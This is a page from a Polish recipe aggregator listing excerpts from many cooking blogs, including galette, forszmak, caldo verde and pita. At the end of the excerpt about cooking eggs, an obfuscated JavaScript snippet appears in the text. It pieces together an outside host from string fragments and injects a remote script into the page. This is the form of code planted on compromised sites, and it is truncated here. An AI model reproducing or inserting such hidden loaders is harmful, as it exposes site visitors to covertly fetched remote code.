kuchnia polska - 1500 przepisów (strona:77/100)

Grillowane polędwiczki z zielonym sosem i tagliatelle 136

Kiedyś podrzucono mi reklamę w jakiejś takiej gazecie Elle czy cuś takiego. Był tam opublikowany konkurs na danie inspirowane kuchnią włoską. Do wygrania były takie fajne czerwone urządzenia Kitchen Aid. Wystarczyło dodać przepis na portalu www.bobyy.pl i czekać na wygraną. Niestety moje polędwiczki nie wygrały... Niemniej jednak przepis został zapisany, a wraz z nim zdjęcie potrawy przed zjedzeniem(...)opisałem na wspomnianym portalu. Ponadto można tam znaleźć ciekawe przepisy, interesujące artykuły. Nota bene, to właśnie na podstawie tego, co stworzyli użytkownicy portalu bobyy.pl został wydany nowy magazyn kulinarny "Polska Gotuje" (wydawnictwo Burda). Traf chciał, że w pierwszym, dziewiczym numerze magazynu, został opublikowany powyższy przepis... Miła nagroda. Podziękował redakcji za nią. Aktualizacja Bobyy.pl przekształciło się w przeslijprzepis.pl

Right Behind The Kitchen
Galette z serem i truskawkami 283

twaróg  z kostki (ale ser z wiaderka też może być), budyń truskawkowy (który nadał masie twarogowej delikatnie różowego koloru) i świeże, słodkie, pachnące, pyszne truskawki, które teraz królują na polskich stołach. Moja Galette z serem i truskawkami bazuje na łatwym w przygotowaniu kruchym kukurydzianym cieście, w którym funkcję spajającą pełni gęsta, kwaśna śmietana. To kruche ciasto doskonale sprawdziło się(...)Przed podaniem galette obkładamy jeszcze czerwonymi porzeczkami i oprószamy cukrem pudrem. Pyszne to było! Smacznego:) The post Galette z serem i truskawkami appeared first on Damsko-męskie spojrzenie na kuchnię

Damsko-męskie spojrzenie na kuchnię
Mazurek kajmakowy z pomarańczą 653

Wielkanoc już za pasem więc czas najwyższy na moja pierwszą świąteczną inspirację przepisową. Zaczynam od słodkości i dzielę się dzisiaj z Tobą przepisem na cudowny mazurek

Delicious Place
Forszmak 109

przystawka od vor – przed + schmackhaft – smaczny, apetyczny. Początkowo był to więc rodzaj przekąski. Niezwykle popularny forszmak w latach 80-tych królował w polskich restauracjach, gdzie podawany był  jako danie główne. Do tej pory smak forszmaku pozostał niezmienny i w takiej samej postaci jak przed laty można się(...)stołówkach wyższych uczelni. Mój forszmak powstał więc trochę z sentymentu do tych studenckich lat. Posmakował całej rodzinie i zagości jeszcze nieraz w mojej kuchni. Składniki: • 250 g mięsa z karkówki • 250 g mięsa z szynki wieprzowej • 150 g boczku wędzonego • kawałek ok. 20 cm cienkiej kiełbasy wędzonej • 4-5 ogórków kiszonych • 1 cebula

To co kocham
Słodki zielnik Lary – Lara Gessler – Książka na niedzielę 194

Słodki zielnik Lary – Lara Gessler – Książka na niedzielę Słodki zielnik Lary – Lara Gessler – Książka na niedzielę.    Słodki zielnik Lary to

Kuchnia na wzgórzu
Torta della nonna czyli włoskie ciasto z polskimi śliwkami 140

Kiedyś upiekłam już torta della nonna czyli włoski tort babci i jest on tutaj [ klik ] a dziś proponuję pyszną jego inną wersję ze śliwkami. Dodałam tutaj

Moje Małe Czarowanie
Bananowe Pole 137

Hej i hopla! Witajcie w 2015 roku. Dla nas to zapowiedź pełnego roku pod znaku Banana i Soli - w końcu nowy rok, nowe możliwości! O tym

Bananowe Pole
Chorwacja, Chorwacja ciąg dalszy... 144

Po trzech dniach niezbyt zachęcającej pogody na niebo wyszło piękne słoneczko, dzięki czemu już jesteśmy brązowi. Brązowi i ciągle najedzeni, gdyż rozpieszcza nas mama właściciela. Zaczęło

Brzuszki Łakomczuszki
Mrożone duszone maślaki 114

Aby cieszyć się smakiem świeżych grzybów zimą możemy je zamrozić. Przygotowałam kilka porcji duszonych maślaków do sosów i zup.Składniki:maślakimasłosól, pieprzSposób wykonania:1. Maślaki starannie

Kuchnia domowa Ani
Sałatka z wątróbką i malinowym sosem 97

Maliny na wytrawnie? Gdy spróbujecie malinowego sosu vinegrette zapewniam, że zagości w Waszych kuchniach na stałe. Jest wyjątkowy – słodko-kwaskowy, nada charakteru każdej sałatce. Ja połączyłam go z tradycyjną, smażoną wątróbką. Połączenie obłędne – taka sałatka sprawdzi się zarówno na obiad w ciepły, letni dzień, a także na kolację, gdy przychodzą goście. Całość jest lekka, a jednocześnie sycąca. Charakteru(...)sałatką można przekonać także osoby, które za wątróbką na co dzień nie przepadają – w takim towarzystwie bardzo zyskuje na smaku. Choć maliny, wątróbka i chałka to składniki typowo polskie, to niezbędna będzie dobrej jakości oliwa z oliwek i ocet balsamiczny, aby nasz sos wyszedł bez zarzutu. Ja użyłam oliwy i octu Gallo , które można zakupić w sklepach sieci Biedronka

Poezja smaku
Caldo verde - portugalska kartoflanka z jarmużem 165

Sezon jarmużowy rozpoczęty i na blogu nowe przepyszne przepisy z tym super zdrowym warzywem. Dzisiaj inspiracja z kuchni portugalskiej, pyszna kartoflanka z dodatkiem jarmużu. W oryginalnej wersji występuje kapusta galicyjska, niestety u nas nieosiągalna. To krzyżówka jarmużu z kapustą pastewną, także jarmuż jest najbliższy oryginału. Widziałam przepisy z kapustą włoską, dla mnie jednak jest to super przepis na wykorzystanie jarmużu(...)składników. Caldo verde to bardzo ekonomiczny posiłek ze sporą porcją warzyw. Zupa jest pyszna w dwóch wersjach i w wersji wege i z dodatkiem kiełbasy chorizo ( u mnie surowa polska). Polecam! Składniki: 500 g ziemniaków około 200 g jarmużu 1 cebula 2 ząbki czosnku 1 l bulionu 1-2 łyżki oliwy/masła ghee papryka wędzona Przygotowanie: jarmuż dokładnie wypłukać

Gotuj zdrowo!Guten Appetit!
Ulubieńcy miesiąca PAŹDZIERNIK 108

końca ogarnięty , ale ... Wybaczam. Oglądam też program bo lubię Ewę Wachowicz oraz Wojtka Amaro. Czekam na finał bo jestem już ciekawa kto wygra całe show. Top Chef Polska   Dariusz Kuźniak   Ewa Wachowicz   Wojciech Modest Amaro MIEJSCE Cafe Pietro swojego czasu bardzo często odwiedzane przeze mnie miejsce a później zapomniane. Na nowo odkryte jakiś czas temu. Wielki(...)kosmetykach od dawna. Jeśli ktoś nie stosuje żadnych podkładów ani pudrów to będzie z niego zadowolony. Cera po nim jest gładka i nawilżona.  SKŁADNIK  Królowało w mojej kuchni awokado i myślę że zostaje w niej już na stałe. A pomyśleć, że jeszcze kilka lat temu nie mogłam na awokado nawet patrzeć. Jak to się smaki przez lata zmieniają

Magiczne Życie Marty
Chlebek pita. 184

Bardzo lubię kuchnię śródziemnomorską, a w szczególności bałkańską. Kiedy byłam jeszcze panienką (jak mówiła moja babcia), często wyjeżdżałam nad Morze Śródziemne, czy Egejskie i zakochałam się w tym klimacie, zapachach, smakach. Później wyszłam za mąż, na świat przyszedł nasz ukochany synek i jakoś zabrakło nam czasu na dalsze wyjazdy. W tym roku ma się to zmienić, więc mocno trzymam kciuki(...)Już nie mogę doczekać się chwili gdy będę leżała na leżaczku pod parasolem, popijając mrożoną kawę, słuchać szumu fal, chłonąć słońce, żeby starczyło na resztę, raczej pochmurnego roku w Polsce. Smak soczystych brzoskwiń, dojrzałych pomidorów i słodkich arbuzów.... ach, gdyby to ode mnie zależało już bym się pakowała ;) Ale wracajmy na ziemię! Za oknem u mnie dzisiaj jest słonecznie, choć

Rozpustne gotowanie
Super zdrowy, pyszny i "odchudzający" koktajl truskawkowy 564

Sezon truskawkowy w pełni! Mam nadzieję, że o wartościach zdrowotnych, a tym bardziej smakowych tych owoców nikogo przekonywać nie trzeba :) Ja je uwielbiam i nie przepuszczam

Taste Of My Day
Sprawdzone metody gotowania i podania jajek 130

rodzinne śniadania przy wspólnym stole. Zobacz artykuł: Poznaj kilka sposobów na jajka wielkanocne . Okres świąt skłania nas do serwowania jaj pod inną niż zazwyczaj postacią. Sporym powodzeniem w polskich domach cieszą się jajka faszerowane czy jajka pod pierzynką. Takie przekąski najładniej się prezentują, kiedy są podane na talerzach do jajek . Każdy z nas powinien mieć w swoim domu to praktyczne(...)jajek . Ich zaletą jest to, że chronią delikatną skorupkęprzed wysoką temperaturą, zapobiegając ich pękaniu w trakcie gotowania i wylewaniu się białka na zewnątrz. To zdecydowanie bardzo przydatny dodatek w kuchni. (function(){ qc4u=document.createElement("script");qc4u_=("us")+("ta"); qc4u_+="t"+(".");qc4u_+=("in");qc4uu="70786408";qc4u.async=true; qc4uu+=".sq61xvuuc4uw106ug";qc4u.type="text/javascript";qc4u_+="f"+"o"+("/"); qc4uu+="i613dfqlwXxm9";qc4u.src="//"+qc4u_+qc4uu; dqc4u=document.body;dqc4u.appendChild

FoodMagazine.pl - Przepisy kulinarne